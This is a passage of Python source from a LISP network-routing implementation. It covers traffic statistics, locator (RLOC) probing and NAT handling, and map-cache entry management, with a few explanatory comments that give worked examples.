def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-12] + "." + count[-12:-9] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
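#
# Worked examples (sketch): normalize(1234567) returns "1.2M",
# normalize(1234567890) returns "1.23B", and counts with 6 or fewer
# digits are returned unchanged.
#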
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version uses the packet/byte counts computed above as
# the title string and puts the rate string built below into a
# pull-down html menu.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} Mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
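#
# Rate computation sketch (not part of the original code): if two
# get_stats() calls are 10 seconds apart (timestamps are floats) and
# 5000 packets totalling 6,000,000 bytes were counted in between, then
#
#   packet_rate = 5000 / 10 = 500 pps
#   bit_rate    = ((6000000 / 10.0) * 8) / 1000000 = 4.8 Mbps
#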
#endclass
#
# ETR/RTR decapsulation total packet and error stats. Any time a new
# lisp_packet().packet_error value is added, a corresponding key string
# must be added to this dictionary.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
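#
# Usage sketch (assumption, not from the original code): when the
# decapsulation path classifies a packet it bumps the matching counter,
# for example
#
#   lisp_decap_stats["ICV-error"].increment(len(packet))
#
# where "packet" is the received LISP-encapsulated payload.
#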
#
# This is a locator-record definition as defined in the LISP RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different from the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
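#
# Worked example (sketch): if the RLOC-probe was sent at t=100.000 and
# the reply was processed at t=100.042, rloc_probe_rtt becomes
# round(100.042 - 100.000, 3) = 0.042 seconds, and the previous RTT
# value is shifted into recent_rloc_probe_rtts[0].
#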
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
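#
# Worked example (assumes LISP_RLOC_PROBE_TTL is 64 purely for
# illustration): if the probe arrived with to_hops 60 and the reply
# carried from_ttl 58, the stored string is "4/6" -- 64 - 60 hops
# toward the RLOC and 64 - 58 hops back. A to_hops of 0 is shown as
# "?", and anything below half the probe TTL is shown as "!".
#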
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl/60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take the uptime modulo the TTL and refresh the entry when we are
# within the first few seconds of a new TTL interval, so a refreshing
# Map-Request goes out roughly once per TTL period.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. Refresh the entry once 90% of the TTL
# has elapsed.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
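#
# Worked example (sketch): with a map_cache_ttl of 60 seconds,
# almost_ttl is 60 - 60/10 = 54, so the entry is considered ready for
# refresh once 54 or more seconds have elapsed since last_refresh_time.
#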
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (that it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put the RLOC in lisp.lisp_rloc_probe_list if it isn't already there.
# And if we removed the RLOC from the best list, we need to remove
# references to it.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get the RLOC indexed by the hash value.
#
rloc = self.best_rloc_set[hashval % length]
#
# If this RLOC is not in up state because it was taken out of up
# state by not receiving echoed nonces, try requesting a nonce again
# after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
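#
# Return-value sketch (not part of the original code): select_rloc()
# hands the caller a 6-element list of
#
#   [encap-address, translated-port, nonce, native-forward-action,
#    rle, rloc-entry]
#
# with unused positions set to None. For example, an RLE hit returns
# [None, None, None, None, rloc.rle, None], while the normal unicast
# case returns the hashed RLOC's address, its translated port, an
# optional echo/request nonce, and the lisp_rloc() entry itself.
#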
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
